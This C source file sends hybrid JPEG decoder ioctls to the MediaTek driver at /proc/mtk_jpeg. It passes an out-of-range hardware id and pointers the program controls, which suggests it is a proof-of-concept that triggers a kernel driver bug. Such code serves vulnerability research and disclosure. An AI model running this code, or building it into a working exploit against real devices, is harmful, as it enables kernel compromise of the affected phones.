#include <sys/ioctl.h>
#include <fcntl.h>
#include<sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>
struct JPEG_DEC_DRV_HYBRID_TASK {
	long timeout;
	int *hwid;
	int *index_buf_fd;
	unsigned int data[21];
};
struct JPEG_DEC_DRV_HYBRID_P_N_S {
	int hwid;
	int *progress_n_status;
};


#define JPEG_IOCTL_MAGIC        'x'

#define JPEG_DEC_IOCTL_HYBRID_START _IOWR(JPEG_IOCTL_MAGIC, 18, struct JPEG_DEC_DRV_HYBRID_TASK)
#define JPEG_DEC_IOCTL_HYBRID_WAIT _IOWR(JPEG_IOCTL_MAGIC, 19, struct JPEG_DEC_DRV_HYBRID_P_N_S)
#define JPEG_DEC_IOCTL_HYBRID_GET_PROGRESS_STATUS _IOWR(JPEG_IOCTL_MAGIC, 20, struct JPEG_DEC_DRV_HYBRID_P_N_S)

int main() {
    int ret;
    struct JPEG_DEC_DRV_HYBRID_TASK start = { 0 };
    int jpegfd = open("/proc/mtk_jpeg",O_RDONLY);
    if(jpegfd == -1) {
        printf("open: %m\n");
        return 1;
    }
    puts("Successful open");
    start.timeout = 3000;
    int hwid = 41414141,index_buf_fd;
    ret = ioctl(jpegfd,JPEG_DEC_IOCTL_HYBRID_START,&start);
    printf("start ioctl: %d %m\nhwid %d\n",ret,hwid);
    void* map = mmap(NULL,0x2000, PROT_READ | PROT_WRITE,MAP_PRIVATE | MAP_ANONYMOUS,0,0);
    struct JPEG_DEC_DRV_HYBRID_P_N_S other = { 0 };
    struct JPEG_DEC_DRV_HYBRID_P_N_S * otherp = map;
    otherp->hwid = hwid;
    otherp->progress_n_status = map + 0x1000;
    otherp->progress_n_status = NULL;
    ret = ioctl(jpegfd,JPEG_DEC_IOCTL_HYBRID_GET_PROGRESS_STATUS,otherp); 
    printf("ioctl get progress: %d %m\n",ret);
    printf("progress_n_status: %d\n",*otherp->progress_n_status);
    close(jpegfd);
}
